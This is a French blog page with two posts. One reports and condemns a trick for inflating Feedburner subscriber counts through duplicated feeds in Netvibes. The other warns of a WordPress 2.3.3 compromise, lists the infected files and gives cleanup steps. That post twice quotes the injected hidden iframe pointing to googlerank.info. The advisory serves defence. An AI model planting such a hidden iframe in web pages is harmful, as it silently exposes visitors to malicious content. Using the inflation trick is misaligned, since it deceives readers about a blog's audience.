Le compteur Feedburner hacké

Bienvenue sur le Journal du Blog, vous pouvez vous abonner au flux RSS. Merci pour votre visite!

Alors qu’on vous parlait du classement Feedburner des blogs Français il y a quelques jours, voilà qu’un rédacteur de NextWeb a eu la grandiose idée de publier une vidéo expliquant comment augmenter votre compteur Feedburner de 2500 abonnés…

Il s’agit d’importer dans Netvibes un fichier opml où vous aurez au préalable copié/collé votre flux plusieurs centaines de fois. Autrement dit, cela va créer un onglet netvibes rempli de module avec votre flux RSS.

Voici la vidéo explicative :

TechCrunch profite de cet incident pour rappeler que le compteur Feedburner ne doit pas servir à juger l’audience d’un blog.

Maintenant il serait temps de remettre les pendules à l’heure. Le compteur FeedBurner est ce qu’il y a de moins important pour mesurer l’audience d’un blog.

Ne vous réjouissez pas trop vite, les équipes de Netvibes vont sans doute trouver une parade très rapidement. Rappelons que cela était déjà arrivé avec PageFlakes.

Hasard ou coïncidence, Christophe de Logiste.be publiait hier un excellent article à ce sujet : Jusqu’où iriez vous pour donner l’air d’avoir un blog qui marche ?

Ceux qui trichent seront un jour ou l’autre sanctionnés.

Faille découverte sur Wordpress 2.3.3

Verne de Creative Breafing vient de découvrir la première faille sur la dernière version de Wordpress (2.3.3)

It came to my attention in the last few days that a handful of people had been experiencing some errors when viewing this site. Many visitors had the site return a 404 Page Not Found error page, while others had their browser crash completely. One individual even reported that their anti-virus software had thrown a red flag while visiting this site. My first instinct was that one of the site’s plugins were causing the errors, but upon further investigation, I have found what I believe to be the catalyst: googlerank.info.

Il nous explique que beaucoup de ses utilisateurs rencontraient des problèmes d’erreurs 404 ou de détections de virus lorsqu’ils consultaient son blog. Le problème viendrait selon lui de googlerank.info

Plus précisement cette ligne de code :

<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>

Voici la liste des fichiers concernés par le problème :

• /wp-admin/admin-footer.php
• /wp-admin/upload.php
• /wp-content/themes/yourtheme/footer.php
• /wp-includes/js/tinymce/blank.htm
• /wp-includes/js/tinymce/license.htm
• /wp-includes/js/tinymce/plugins/paste/blank.htm
• /wp-includes/js/tinymce/plugins/paste/pastetext.htm
• /wp-includes/js/tinymce/plugins/paste/pasteworld.htm
• /wp-includes/js/tinymce/themes/advanced/about.htm
• /wp-includes/js/tinymce/themes/advanced/anchor.htm
• /wp-includes/js/tinymce/themes/advanced/charmap.htm
• /wp-includes/js/tinymce/themes/advanced/color_picker.htm
• /wp-includes/js/tinymce/themes/advanced/image.htm
• /wp-includes/js/tinymce/themes/advanced/link.htm
• /wp-includes/js/tinymce/themes/advanced/source_editor.htm

Une solution (temporaire) :

1. Re-uploadez votre ficiher footer.php file dans le dossier de votre thème. Assurez vous d’avoir supprimer la ligne cité ci dessus au préalable
2. Si vous utilisez l’editeur de thème via l’admin Wordpress, éditez le ficiher footer.php (pied de page). Cherchez la ligne de code suivante puis supprimez là :<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>
3. Téléchargez la dernière version de Wordpress ici
4. Copiez les dossier /wp-admin/ et /wp-includes/ sur votre serveur en écrasant les fichiers antérieur, cela remettra en place votre version de Wordpress.

La sortie de la version 2.5 de wordpress va t’elle faire son apparation plus tôt que prévu ?

Crédit photo/montage  : Business Garden